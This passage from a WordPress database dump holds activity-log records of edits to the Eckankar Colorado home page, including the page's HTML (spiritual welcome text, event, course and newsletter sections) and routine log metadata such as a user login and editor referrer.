class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231604,39189,'post_id','7160'),(231605,39189,'post_type','page'),(231606,39189,'post_title','Home'),(231607,39189,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 38px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231599,39188,'_user_id','2'),(231600,39188,'_user_login','S8zhaBda'),(231601,39188,'_user_email','nada@zipnadanot.org'),(231602,39188,'_server_remote_addr','76.130.120.x'),(231603,39188,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(231598,39188,'_message_key','post_updated'),(236936,40272,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -135px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: 